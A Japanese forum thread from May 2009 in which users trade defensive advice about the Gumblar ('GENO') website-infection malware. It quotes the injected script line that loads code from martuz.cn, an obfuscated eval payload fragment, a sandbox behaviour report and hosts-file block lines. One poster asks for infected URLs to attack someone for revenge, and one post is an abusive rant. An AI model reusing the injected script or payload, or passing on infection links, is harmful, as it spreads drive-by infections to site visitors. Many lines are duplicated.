他のヤツに権限を与えない方がよいよ。
そのあたりは大丈夫だと思うけど。
238 :192.168.0.774:2009/05/17(日) 15:24:42 ID:7TaPV4fL0
AdobeのFlashとReaderを最新にしていたら
感染サイトを踏んでも大丈夫という情報を広めてきます。
感染サイトを踏んでも大丈夫という情報を広めてきます。
239 :192.168.0.774:2009/05/17(日) 15:29:08 ID:/4yp3BhL0
2ちゃんの専ブラはだいじょうぶなんかねぇ。
オレJaneDoeViewだけど情報収集はここしかわからんのが困るわw
オレJaneDoeViewだけど情報収集はここしかわからんのが困るわw
240 :192.168.0.774:2009/05/17(日) 15:30:27 ID:7TaPV4fL0
URLは極力踏まないようにすればいいよ
241 :192.168.0.774:2009/05/17(日) 15:30:42 ID:gvZ9d8TtP
ソフ板も見るといいよ
242 :192.168.0.774:2009/05/17(日) 15:31:20 ID:rsI8zkAT0
>>239
専ブラは平気
専ブラは平気
243 :192.168.0.774:2009/05/17(日) 15:32:26 ID:Dx3JCXno0
>>241
URLを張っていただくとありがたい
URLを張っていただくとありがたい
244 :192.168.0.774:2009/05/17(日) 15:33:07 ID:Z6bHwWLb0
>>242
IEコンポーネントでも?
IEコンポーネントでも?
245 :192.168.0.774:2009/05/17(日) 15:33:15 ID:gvZ9d8TtP
246 :192.168.0.774:2009/05/17(日) 15:34:25 ID:1tk6kEt+0
しかし、Adobe Readerはわざと常駐を切らない限り、Adobe Updaterが
更新を知らせてくれるけど、Flashはヤバいね。
大手サイトでフラッシュ使ってるところは要求バージョンを常に最新に
してほしいもんだ。
更新を知らせてくれるけど、Flashはヤバいね。
大手サイトでフラッシュ使ってるところは要求バージョンを常に最新に
してほしいもんだ。
247 :192.168.0.774:2009/05/17(日) 15:35:11 ID:Dx3JCXno0
>>245
ありです
ありです
248 :192.168.0.774:2009/05/17(日) 15:35:31 ID:7TaPV4fL0
そりゃないよ
249 :192.168.0.774:2009/05/17(日) 15:37:28 ID:vH8KoEBz0
>>237見てまともなリンク先かと思って225踏んじまったじゃねーかw
250 :192.168.0.774:2009/05/17(日) 15:43:52 ID:7yrlZLjk0
>>246
むしろフラッシュを使わないで欲しい
むしろフラッシュを使わないで欲しい
251 :192.168.0.774:2009/05/17(日) 15:48:45 ID:7TaPV4fL0
うぉっかないなぁ
252 :192.168.0.774:2009/05/17(日) 15:49:21 ID:6zykGUMd0
アクセス制限中です。しばらく経ってからアクセスしてください。
※ 現在、大規模な攻撃を受けており、このシステムを導入しています。
ご迷惑をかけてすいません。 (o*。_。)oペコッ
チェッカー ><
※ 現在、大規模な攻撃を受けており、このシステムを導入しています。
ご迷惑をかけてすいません。 (o*。_。)oペコッ
チェッカー ><
253 :192.168.0.774:2009/05/17(日) 15:59:54 ID:MP/sWvjo0
GENOウイルスチェッカー
今入ってるけど まさか俺のせいじゃないよね。
今入ってるけど まさか俺のせいじゃないよね。
254 :192.168.0.774:2009/05/17(日) 16:00:53 ID:ilxyL7Fy0
>>219
exeの方を、Normanのサンドボックスに投げ込んだ結果の回答をコピペ
前は34.exeとu.batだったのがファイル名変わってるなぁ。
[ DetectionInfo ]
* Filename: C:\analyzer\scan\martuz_cn_id10_20090517.exe.
* Sandbox name: NO_MALWARE
* Signature name: NO_VIRUS.
* Compressed: YES.
* TLS hooks: YES.
* Executable type: Application.
* Executable file structure: OK.
* Filetype: PE_I386.
[ General information ]
* Decompressing UPX3.
* File length: 15872 bytes.
* MD5 hash: b0ca69853b371ec9eb58829e869f6f10.
[ Changes to filesystem ]
* Creates file C:\_.e.
* Deletes file c:\sample.exe.
* Creates file C:\e.bat.
* Deletes file "c:\_.e" .
* Deletes file "c:\e.bat".
[ Changes to registry ]
* Accesses Registry key "HKLM\SoFtWARE\Microsoft\Windows nT\currentversion\Drivers32".
[ Process/window information ]
* Creates process "CMD.EXE".
[ Signature Scanning ]
* c:\sample.exe (15872 bytes) : no signature detection.
* C:\_.e (15872 bytes) : no signature detection.
exeの方を、Normanのサンドボックスに投げ込んだ結果の回答をコピペ
前は34.exeとu.batだったのがファイル名変わってるなぁ。
[ DetectionInfo ]
* Filename: C:\analyzer\scan\martuz_cn_id10_20090517.exe.
* Sandbox name: NO_MALWARE
* Signature name: NO_VIRUS.
* Compressed: YES.
* TLS hooks: YES.
* Executable type: Application.
* Executable file structure: OK.
* Filetype: PE_I386.
[ General information ]
* Decompressing UPX3.
* File length: 15872 bytes.
* MD5 hash: b0ca69853b371ec9eb58829e869f6f10.
[ Changes to filesystem ]
* Creates file C:\_.e.
* Deletes file c:\sample.exe.
* Creates file C:\e.bat.
* Deletes file "c:\_.e" .
* Deletes file "c:\e.bat".
[ Changes to registry ]
* Accesses Registry key "HKLM\SoFtWARE\Microsoft\Windows nT\currentversion\Drivers32".
[ Process/window information ]
* Creates process "CMD.EXE".
[ Signature Scanning ]
* c:\sample.exe (15872 bytes) : no signature detection.
* C:\_.e (15872 bytes) : no signature detection.
255 :192.168.0.774:2009/05/17(日) 16:02:33 ID:MDg7JZzS0
ウィルスバスターは何してるの?
256 :192.168.0.774:2009/05/17(日) 16:05:39 ID:VMAXjN900
お前らウイルスセキュリティ馬鹿にしてるけどいい加減にしろよ?
2ちゃんの連帯感みたいなの感じちゃって調子に乗ってるんだろ?
正直、 うざいから死んでwww(爆藁
信者とか妄想してる暇があったら親孝行しろw糞ww
どうせリアルじゃペコペコしてんだろw
ウイルスセキュリティ以下の人間だよね?
君たちww
妄想と批判しか出来ない哀れな奴らw
ウイルスセキュリティ叩いてどうなる?
お前らマヂ頭使えw
2ちゃんの連帯感みたいなの感じちゃって調子に乗ってるんだろ?
正直、 うざいから死んでwww(爆藁
信者とか妄想してる暇があったら親孝行しろw糞ww
どうせリアルじゃペコペコしてんだろw
ウイルスセキュリティ以下の人間だよね?
君たちww
妄想と批判しか出来ない哀れな奴らw
ウイルスセキュリティ叩いてどうなる?
お前らマヂ頭使えw
257 :192.168.0.774:2009/05/17(日) 16:06:51 ID:ovH4yFdR0
>>255
更新キターって聞いたけど自分のところでは黙ったままだ
更新キターって聞いたけど自分のところでは黙ったままだ
258 :192.168.0.774:2009/05/17(日) 16:07:03 ID:MDg7JZzS0
ウィルスバスターいれてるんだけど役に立たないの?
対応してくれないの?
対応してくれないの?
259 :192.168.0.774:2009/05/17(日) 16:08:37 ID:61lOiijw0
pdf見るのにFoxitReader使ってて、AdobeReaderはインスコしてないんだが、
これってFoxitReader経由でも感染するのか?
これってFoxitReader経由でも感染するのか?
260 :192.168.0.774:2009/05/17(日) 16:09:40 ID:F5MPX4G50
>>246
それはいいね、前回のGENO騒動までアップデートを全くしてなかったから危なかった
それはいいね、前回のGENO騒動までアップデートを全くしてなかったから危なかった
261 :192.168.0.774:2009/05/17(日) 16:12:35 ID:MP/sWvjo0
>>257
俺のノートンもライブアップデートが沈黙してた。
仕方ないので手作業で定義ファイル落としてきた。あくまでもノートンの話。
xxxp://www.omora.pink-no1.net/の入った先menu/menu1.htmlが
危険度200%
かなり危険なURLです。友人のPCを壊すのに利用しましょう!
絶対に踏んではいけません。
これ危ないのかな?
俺のノートンもライブアップデートが沈黙してた。
仕方ないので手作業で定義ファイル落としてきた。あくまでもノートンの話。
xxxp://www.omora.pink-no1.net/の入った先menu/menu1.htmlが
危険度200%
かなり危険なURLです。友人のPCを壊すのに利用しましょう!
絶対に踏んではいけません。
これ危ないのかな?
263 :192.168.0.774:2009/05/17(日) 16:18:48 ID:KdAQNY9c0
テメーのサイト見たらウィルスに感染したぞゴルァ路線はどうだろう
264 :192.168.0.774:2009/05/17(日) 16:19:19 ID:1tk6kEt+0
265 :192.168.0.774:2009/05/17(日) 16:22:29 ID:MP/sWvjo0
>>264
d。一応入らないにしとく。
d。一応入らないにしとく。
266 :192.168.0.774:2009/05/17(日) 16:22:31 ID:Grc1h74N0
脅威だな
救急車依頼の恐怖を感じてるんだけど
救急車依頼の恐怖を感じてるんだけど
267 :192.168.0.774:2009/05/17(日) 16:23:07 ID:oRKg9iVz0
>>266
どんだけ大昔のだよww
どんだけ大昔のだよww
268 :192.168.0.774:2009/05/17(日) 16:29:20 ID:MDg7JZzS0
ウイルスバスターはなにしてるの?
なにもしないの?
なにもしないの?
269 :192.168.0.774:2009/05/17(日) 16:30:53 ID:f7PXip0E0
GENOウイルス対策
■hostsファイル書き換え
hostsファイルに以下の行を追加
127.0.0.1 zlkon.lv
127.0.0.1 gumlar.cn
127.0.0.1 martuz.cn
↑これをちょっと説明して頂けませんか?
■hostsファイル書き換え
hostsファイルに以下の行を追加
127.0.0.1 zlkon.lv
127.0.0.1 gumlar.cn
127.0.0.1 martuz.cn
↑これをちょっと説明して頂けませんか?
270 :192.168.0.774:2009/05/17(日) 16:33:10 ID:7TaPV4fL0
zlkon.lv
gumlar.cn
martuz.cn
に飛ぼうとすると127.0.0.1に飛ぶってことです。
要するに本来のIPに飛ぼうとするのを防止します。
gumlar.cn
martuz.cn
に飛ぼうとすると127.0.0.1に飛ぶってことです。
要するに本来のIPに飛ぼうとするのを防止します。
271 :192.168.0.774:2009/05/17(日) 16:36:06 ID:CuLRuFv70
>>269
右側のzlkon.lvとかにアクセスしようとする
↓
hostsの内部処理で127.0.0.1に読み替えてそこにアクセスする
↓
127.0.0.1は自分自身なので本当のzlkon.lvのIPアドレスにはアクセスしない
↓
安全
右側のzlkon.lvとかにアクセスしようとする
↓
hostsの内部処理で127.0.0.1に読み替えてそこにアクセスする
↓
127.0.0.1は自分自身なので本当のzlkon.lvのIPアドレスにはアクセスしない
↓
安全
272 :192.168.0.774:2009/05/17(日) 16:36:26 ID:MDg7JZzS0
ウィルスバスターな何やってるんだよ
早くしてくれよ
感染してるかもしれないのに
早くしてくれよ
感染してるかもしれないのに
273 :192.168.0.774:2009/05/17(日) 16:36:46 ID:0CtfCDPI0
>>186
これも martuz.cn に飛ばすんだな
<script src=//ma"+"rtuz.cn/vid/?id="+j+"><\/script>
martuz.cnにアク禁くらわせるだけでかなり防げそうだな、こりゃ
これも martuz.cn に飛ばすんだな
<script src=//ma"+"rtuz.cn/vid/?id="+j+"><\/script>
martuz.cnにアク禁くらわせるだけでかなり防げそうだな、こりゃ
274 :192.168.0.774:2009/05/17(日) 16:37:45 ID:7UVnacRX0
www■laqoo.net■kyouun■pet■index.html
でavast先生がredirector H8検知した。
侵入前にブロックできたって認識でいいのかなぁ。
おかしな挙動は見られないが
でavast先生がredirector H8検知した。
侵入前にブロックできたって認識でいいのかなぁ。
おかしな挙動は見られないが
275 :192.168.0.774:2009/05/17(日) 16:40:59 ID:uRUXabUv0
>>269
初期の頃は直接IPが記述してあって、感染中に.exeをダウンロードする為そこに繋ごうとしていた。
ウィルス対策ソフトでそのIPがBANされつつある中、zlkon.lvとかgumlar.cnとか適当なドメイン名を経由して.exeのダウンロードを行おうとする手段が登場
ソフトの対策遅れでまだその経由した方からは繋がっちゃったりが有るんで、
windows標準の "ホスト名>IPの変換を手動で上書きする" 方法によってzlkon.lvやgumlar.cnに繋がないようにする
初期の頃は直接IPが記述してあって、感染中に.exeをダウンロードする為そこに繋ごうとしていた。
ウィルス対策ソフトでそのIPがBANされつつある中、zlkon.lvとかgumlar.cnとか適当なドメイン名を経由して.exeのダウンロードを行おうとする手段が登場
ソフトの対策遅れでまだその経由した方からは繋がっちゃったりが有るんで、
windows標準の "ホスト名>IPの変換を手動で上書きする" 方法によってzlkon.lvやgumlar.cnに繋がないようにする
276 :192.168.0.774:2009/05/17(日) 16:41:05 ID:0CtfCDPI0
277 :192.168.0.774:2009/05/17(日) 16:42:04 ID:W3Qz58cJ0
278 :192.168.0.774:2009/05/17(日) 16:45:11 ID:f7PXip0E0
>>270
ありがとうございます
127.0.0.1がマシン自体を表すアドレスってことは、今調べて分かったのですが
firefoxのAdblock Plusのフィルタリストに「zlkon.lv」「gumlar.cn」「martuz.cn 」
を入れても阻止できるんでしょうか?
ありがとうございます
127.0.0.1がマシン自体を表すアドレスってことは、今調べて分かったのですが
firefoxのAdblock Plusのフィルタリストに「zlkon.lv」「gumlar.cn」「martuz.cn 」
を入れても阻止できるんでしょうか?
279 :192.168.0.774:2009/05/17(日) 16:48:13 ID:f7PXip0E0
280 :192.168.0.774:2009/05/17(日) 16:49:30 ID:6zykGUMd0
>>274
(function(rzm){var x34p='%';eval(unescape(
('v.61r.20a.3d.22.53cript.45ng.69ne.22.2cb.3d.22Version()+・・・・・・
ttp://www.virustotal.com/jp/analisis/f6c9816c6f54c01b06b00a8dc7a44d64
(function(rzm){var x34p='%';eval(unescape(
('v.61r.20a.3d.22.53cript.45ng.69ne.22.2cb.3d.22Version()+・・・・・・
ttp://www.virustotal.com/jp/analisis/f6c9816c6f54c01b06b00a8dc7a44d64
281 :192.168.0.774:2009/05/17(日) 16:51:53 ID:0CtfCDPI0
>>264 いないよね。でもこんなスクリプトの化け物みたいなページにはブラウザでアクセスしたくないわw
282 :192.168.0.774:2009/05/17(日) 16:54:08 ID:61lOiijw0
ググったけどAdobeReaderインストールしてなくてFoxit使っててもヤバいのね・・・
Foxitも環境設定でJavaScript切らないと駄目か
Foxitも環境設定でJavaScript切らないと駄目か
283 :192.168.0.774:2009/05/17(日) 16:55:23 ID:6zykGUMd0
>>264
無し
無し
284 :192.168.0.774:2009/05/17(日) 17:01:44 ID:7UVnacRX0
285 :192.168.0.774:2009/05/17(日) 17:01:54 ID:0CtfCDPI0
286 :192.168.0.774:2009/05/17(日) 17:02:08 ID:LQE1Ao+t0
>>282 俺も使ってる それ気になるな。
287 :192.168.0.774:2009/05/17(日) 17:11:33 ID:gLr/8LT/0
hostsファイルに以下の行を追加というのは
上と同じように#の中に入れればいいのでしょうか
上と同じように#の中に入れればいいのでしょうか
288 :192.168.0.774:2009/05/17(日) 17:12:13 ID:MP/sWvjo0
289 :192.168.0.774:2009/05/17(日) 17:13:54 ID:CuLRuFv70
290 :192.168.0.774:2009/05/17(日) 17:14:57 ID:1tk6kEt+0
291 :192.168.0.774:2009/05/17(日) 17:16:51 ID:1tk6kEt+0
>>289
なぜか数ヶ月前にWindows Defenderがlocalhostの記述行を削除したよ。
なぜか数ヶ月前にWindows Defenderがlocalhostの記述行を削除したよ。
292 :192.168.0.774:2009/05/17(日) 17:19:00 ID:q8u6cZFi0
やっぱここが一番建設的なスレだな
293 :192.168.0.774:2009/05/17(日) 17:22:25 ID:gLr/8LT/0
>>289-290
ありがとうございました
ありがとうございました
294 :192.168.0.774:2009/05/17(日) 17:23:07 ID:f7PXip0E0
>>278誰か分かりませんでしょうか?
295 :192.168.0.774:2009/05/17(日) 17:25:09 ID:1tk6kEt+0
>>294
たぶん大丈夫だと思うけど、hosts書きかえちゃった方がより確実。
たぶん大丈夫だと思うけど、hosts書きかえちゃった方がより確実。
296 :192.168.0.774:2009/05/17(日) 17:28:02 ID:0CtfCDPI0
>>294
adblockがどんなもんかは知らんけど、firefoxしか使わないんなら大丈夫なんじゃね?
ただサイトはこれからもどんどん増えるので、この3つさえ入れときゃ明日も安心ってわけじゃないんだけどね
adobeを最新にして全てを忘れるのが一番幸せかも試練
adblockがどんなもんかは知らんけど、firefoxしか使わないんなら大丈夫なんじゃね?
ただサイトはこれからもどんどん増えるので、この3つさえ入れときゃ明日も安心ってわけじゃないんだけどね
adobeを最新にして全てを忘れるのが一番幸せかも試練
297 :192.168.0.774:2009/05/17(日) 17:30:02 ID:f7PXip0E0
>>295-296
ありがとうございます、気を付けます
ありがとうございます、気を付けます
298 :192.168.0.774:2009/05/17(日) 17:32:19 ID:6zykGUMd0
Spybot - Search & Destroy もhosts書き換えますね
299 :192.168.0.774:2009/05/17(日) 17:39:49 ID:7TaPV4fL0
はい。
300 :192.168.0.774:2009/05/17(日) 17:49:24 ID:6zykGUMd0
martuz.cnノートンが対応
ttps://safeweb.norton.com/report/show?name=martuz.cn
ttps://safeweb.norton.com/report/show?name=martuz.cn
301 :192.168.0.774:2009/05/17(日) 17:49:53 ID:7TaPV4fL0
ノートンGJ
302 :192.168.0.774:2009/05/17(日) 17:58:11 ID:Grc1h74N0
やべえノートンに乗り換えるときがきたかも
303 :192.168.0.774:2009/05/17(日) 18:01:36 ID:mIA3fiU30
>>300
おお
おお
304 :192.168.0.774:2009/05/17(日) 18:05:57 ID:O4C38sHjP
今北用ってもう誰か作ってる?
無いなら作るけど
無いなら作るけど
305 :192.168.0.774:2009/05/17(日) 18:24:33 ID:1tk6kEt+0
>>300
その一方でgumlar.cnは安全。
https://safeweb.norton.com/report/show?name=gumblar.cn
gumlar.cnは実際にもう動作停止状態なのかな?
その一方でgumlar.cnは安全。
https://safeweb.norton.com/report/show?name=gumblar.cn
gumlar.cnは実際にもう動作停止状態なのかな?
306 :192.168.0.774:2009/05/17(日) 18:24:59 ID:Pub4l/uF0
zlkon.lvとgumlar.cnは本当にこのドメインなのか?
SCFに遮断させたら、martuz.cnはおkらしいが、↑二つは「DNSで解決されていません追加しますか?」
だとよ。
SCFに遮断させたら、martuz.cnはおkらしいが、↑二つは「DNSで解決されていません追加しますか?」
だとよ。
307 :192.168.0.774:2009/05/17(日) 18:25:21 ID:QPPdxGJ80
昨日このウイルスを知って不安だったので書き込みします
【OS】
XP
【使用セキュリティソフト】
avast
【疑った理由】
ニコニコの動画を見る際に『JavaScriptが無効になってます』といったような文字が出て
最新のフラッシュプレイヤーを入れてくださいとの表記が出た。
【症状】
PCがとても重いときがあり、MWPで曲を聴いてたのが音飛びが酷くなり
フリーズ直前までいったこともあった(作業中ではあったが・・・)
【確認手段】
cmd.exe、regedit.exeは使用可能
sqlsodbc.chmのサイズ確認
【結果】
フラッシュプレイヤーを最新にして以降ニコニコは見れるようになった
今のところ怪しげなパケットはなさそうだが不安
【OS】
XP
【使用セキュリティソフト】
avast
【疑った理由】
ニコニコの動画を見る際に『JavaScriptが無効になってます』といったような文字が出て
最新のフラッシュプレイヤーを入れてくださいとの表記が出た。
【症状】
PCがとても重いときがあり、MWPで曲を聴いてたのが音飛びが酷くなり
フリーズ直前までいったこともあった(作業中ではあったが・・・)
【確認手段】
cmd.exe、regedit.exeは使用可能
sqlsodbc.chmのサイズ確認
【結果】
フラッシュプレイヤーを最新にして以降ニコニコは見れるようになった
今のところ怪しげなパケットはなさそうだが不安
308 :192.168.0.774:2009/05/17(日) 18:28:15 ID:/SoDyIML0
>>300
js切ってても見れるようにしとけよ
js切ってても見れるようにしとけよ
309 :192.168.0.774:2009/05/17(日) 18:28:42 ID:6zykGUMd0
>>305
ほんとだ???
ほんとだ???
310 :192.168.0.774:2009/05/17(日) 18:28:53 ID:Pl/Rjd540
>307
報告御苦労
報告御苦労
311 :192.168.0.774:2009/05/17(日) 18:28:59 ID:f7PXip0E0
GENOウイルス対策
■adobe flashplayerを最新版に更新
Adobe Flash PlayerとShockwave Flashって同じものですか?
■adobe flashplayerを最新版に更新
Adobe Flash PlayerとShockwave Flashって同じものですか?
312 :192.168.0.774:2009/05/17(日) 18:30:14 ID:Pub4l/uF0
>>311
違う。
違う。
313 :192.168.0.774:2009/05/17(日) 18:32:32 ID:kVP/8H1t0
>>307
それ原因は別だから安心しなさい。
それ原因は別だから安心しなさい。
314 :192.168.0.774:2009/05/17(日) 18:32:51 ID:1tk6kEt+0
315 :192.168.0.774:2009/05/17(日) 18:33:56 ID:6zykGUMd0
5/15 21:00ごろにgumblar.cnのAレコードの登録がなくなりました。
Aレコードがなくなりましたのでとりあえずgumblar.cnは意味がなくなりました。ただ、
レジストラによる対策ではない?ようなので
再度Aレコードが登録される可能性があるので、引き続き注意は必要です。
これか?
ttp://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=gumblar%2Ecn+%A4%AB%A4%E9+martuz%2Ecn+%A4%D8
Aレコードがなくなりましたのでとりあえずgumblar.cnは意味がなくなりました。ただ、
レジストラによる対策ではない?ようなので
再度Aレコードが登録される可能性があるので、引き続き注意は必要です。
これか?
ttp://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=gumblar%2Ecn+%A4%AB%A4%E9+martuz%2Ecn+%A4%D8
316 :192.168.0.774:2009/05/17(日) 18:34:11 ID:f7PXip0E0
317 :192.168.0.774:2009/05/17(日) 18:34:48 ID:jSw80LZp0
318 :192.168.0.774:2009/05/17(日) 18:38:45 ID:1tk6kEt+0
319 :192.168.0.774:2009/05/17(日) 18:39:36 ID:kVP/8H1t0
手打ち職人の朝は早い。
320 :192.168.0.774:2009/05/17(日) 18:39:49 ID:4DIp3Q850
321 :192.168.0.774:2009/05/17(日) 18:41:13 ID:7TaPV4fL0
もしかして今GENOウイルスまとめサイト重い?
322 :192.168.0.774:2009/05/17(日) 18:41:36 ID:FkoNww+u0
>>318
今確認してきたら、GENOウィルスチェッカーのhostsファイルもgumlarになっとった。
今確認してきたら、GENOウィルスチェッカーのhostsファイルもgumlarになっとった。
323 :192.168.0.774:2009/05/17(日) 18:42:05 ID:Pub4l/uF0
gumblar.cnにしても同じだ。
zlkon.lvも
zlkon.lvも
324 :192.168.0.774:2009/05/17(日) 18:42:23 ID:7TaPV4fL0
325 :192.168.0.774:2009/05/17(日) 18:43:56 ID:4DIp3Q850
頼む('A`)
誰か地獄少女にアクセスしたんだが404だ
代わりにGEOウィルスで復讐したいんでURLくれー(VAV)
誰か地獄少女にアクセスしたんだが404だ
代わりにGEOウィルスで復讐したいんでURLくれー(VAV)
326 :192.168.0.774:2009/05/17(日) 18:45:08 ID:1tk6kEt+0
>>323
有効なAレコードを消しちゃってる状態だから名前解決できないんでしょ。
有効なAレコードを消しちゃってる状態だから名前解決できないんでしょ。
327 :192.168.0.774:2009/05/17(日) 18:47:09 ID:QPPdxGJ80
>>313
もしよろしければ詳しく教えていただけないでしょうか?
もしよろしければ詳しく教えていただけないでしょうか?
328 :192.168.0.774:2009/05/17(日) 18:49:30 ID:kVP/8H1t0
NGID 4DIp3Q850 、と。よしスッキリ。
329 :192.168.0.774:2009/05/17(日) 18:50:18 ID:Pub4l/uF0
詳しくないけど、どちらも逆引き出来ないね。
ttp://safeweb.norton.com/report/show?url=zlkon.lv&.x=5&.y=6
で評価が出ることと、DNSが有効化は別問題?
ttp://safeweb.norton.com/report/show?url=zlkon.lv&.x=5&.y=6
で評価が出ることと、DNSが有効化は別問題?
330 :192.168.0.774:2009/05/17(日) 18:52:45 ID:1PB83W/v0
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ('A`) ? ? ? ? なんだか無償にコピペしたくなる
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ? なのに初心者にはコピペできない
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ('A`) ? ? ? ? なんだか無償にコピペしたくなる
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ? なのに初心者にはコピペできない
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
331 :192.168.0.774:2009/05/17(日) 18:53:17 ID:E5NPdo1R0
332 :192.168.0.774:2009/05/17(日) 18:53:35 ID:1tk6kEt+0
333 :192.168.0.774:2009/05/17(日) 18:53:45 ID:Dx3JCXno0
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ('A`) ? ? ? ? なんだか無償にコピペしたくなる
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ? なのに初心者にはコピペできない
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ('A`) ? ? ? ? なんだか無償にコピペしたくなる
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ? なのに初心者にはコピペできない
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
334 :192.168.0.774:2009/05/17(日) 18:56:04 ID:Pub4l/uF0
つまりキャッシュ情報表示してたのね。
Nortonのは今日初めて使ったが、意味ないサービスだな
Nortonのは今日初めて使ったが、意味ないサービスだな
335 :192.168.0.774:2009/05/17(日) 18:57:24 ID:+UWQkKTW0
まとめサイトが感染したってマジ?
336 :192.168.0.774:2009/05/17(日) 19:00:24 ID:PGm7MFXg0
>>335
ソースはお前の頭ん中か?
ソースはお前の頭ん中か?
337 :192.168.0.774:2009/05/17(日) 19:02:16 ID:f7PXip0E0
338 :192.168.0.774:2009/05/17(日) 19:02:19 ID:+UWQkKTW0
339 :192.168.0.774:2009/05/17(日) 19:09:37 ID:Rr9xCLR70
340 :192.168.0.774:2009/05/17(日) 19:10:00 ID:DAUhxtRJ0
441 名前: ムラサキサギゴケ(catv?)[sage] 投稿日:2009/05/16(土) 23:32:08.96 ID:K/FFIX2k
・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ビコン」公式サイト【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ビコン」公式サイト【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
341 :192.168.0.774:2009/05/17(日) 19:12:00 ID:pC5ZVjuD0
Warning: fopen() [function.fopen]: Unable to access log/2009516.dat in /virtual/owata-net/public_html/owata-net.com/index.php on line 123
Warning: fopen(log/2009516.dat) [function.fopen]: failed to open stream: No such file or directory in /virtual/owata-net/public_html/owata-net.com/index.php on line 123
毎日チェックしてるサイトでこんなの表示されたけど意味がわからない。
Warning:とか出てるから気味悪いけどgenoと関係ないよね?
セキュ板にも貼ったけど荒れててダメっぽい!
Warning: fopen(log/2009516.dat) [function.fopen]: failed to open stream: No such file or directory in /virtual/owata-net/public_html/owata-net.com/index.php on line 123
毎日チェックしてるサイトでこんなの表示されたけど意味がわからない。
Warning:とか出てるから気味悪いけどgenoと関係ないよね?
セキュ板にも貼ったけど荒れててダメっぽい!
342 :192.168.0.774:2009/05/17(日) 19:14:49 ID:7TaPV4fL0
チェッカーに通してみて
343 :192.168.0.774:2009/05/17(日) 19:15:38 ID:aydvb1+C0
「便所の落書き」「痰ツボ」と罵倒されてきた2ちゃんねるがGENOウィルス騒動の解決に
一番大きく貢献するまで、あと五日。
(「その時歴史が動いた」 2078年5月放送予定)
一番大きく貢献するまで、あと五日。
(「その時歴史が動いた」 2078年5月放送予定)
344 :192.168.0.774:2009/05/17(日) 19:16:15 ID:kuRpimDu0
>340
コピペにこんなこと言うのもなんだが
×総合ホビー展示即売会「ビコン」
○総合ホビー展示即売会「ホビコン」
ホビーコンプレックスの略でホビコンね。
コピペにこんなこと言うのもなんだが
×総合ホビー展示即売会「ビコン」
○総合ホビー展示即売会「ホビコン」
ホビーコンプレックスの略でホビコンね。
345 :192.168.0.774:2009/05/17(日) 19:18:44 ID:6zykGUMd0
★11荒れすぎ w
346 :192.168.0.774:2009/05/17(日) 19:20:41 ID:4g69K7//0
★1〜2スレあたりはセキュ板とν速がほとんどだったからね
同人・VIPから流れてきてひどいことになった
同人・VIPから流れてきてひどいことになった
347 :192.168.0.774:2009/05/17(日) 19:21:07 ID:qd90in+R0
荒れてるか?
あれくらい大したことないと思うけど
あれくらい大したことないと思うけど
348 :192.168.0.774:2009/05/17(日) 19:26:28 ID:NUScdqsg0
Chromeも対象になったのが出たとかニュー即で言われたり
背景黒いほうのwikiの「感染したと〜」とアドレスがおかしいとかセキュ板で言われたり
またなんかいろいろ来たらしいけど結局どうなってんのこれ
背景黒いほうのwikiの「感染したと〜」とアドレスがおかしいとかセキュ板で言われたり
またなんかいろいろ来たらしいけど結局どうなってんのこれ
349 :192.168.0.774:2009/05/17(日) 19:28:52 ID:OKDvuiXi0
IDも出ないセキュ板の情報なんて信用出来んわ
自演し放題だし
自演し放題だし
350 :192.168.0.774:2009/05/17(日) 19:29:20 ID:MP/sWvjo0
何か一行だけになっちゃったよチェッカーのところ。
■hostsファイル書き換え
hostsファイルに以下の行を追加
127.0.0.1 martuz.cn
ひょっとしてgumblar.cn zlkon.lv要らないの?
127.0.0.1 zlkon.lv
127.0.0.1 gumblar.cn
127.0.0.1 martuz.cn
■hostsファイル書き換え
hostsファイルに以下の行を追加
127.0.0.1 martuz.cn
ひょっとしてgumblar.cn zlkon.lv要らないの?
127.0.0.1 zlkon.lv
127.0.0.1 gumblar.cn
127.0.0.1 martuz.cn
351 :192.168.0.774:2009/05/17(日) 19:30:07 ID:qTLKsZ5C0
見れない=感染じゃなくて
ただの集中でアクセスできないだけでしょ
ただの集中でアクセスできないだけでしょ
352 :192.168.0.774:2009/05/17(日) 19:30:13 ID:q9beek69O
セキュリティ板 GENOスレ11の9で紹介されていた、
ポート135, 445を閉じたらネットに繋げなくなった。
元に戻そうにもプロパティが表示されない。
デバイスマネージャーやサービスの画面を閉じようとすると
プロパティを閉じろと言われるけど、Alt+Tabで探しても見つからない。
それにコンパネの右半分が真っ白。データフォルダの方は正常に表示されるのに。
誰か助けてください。
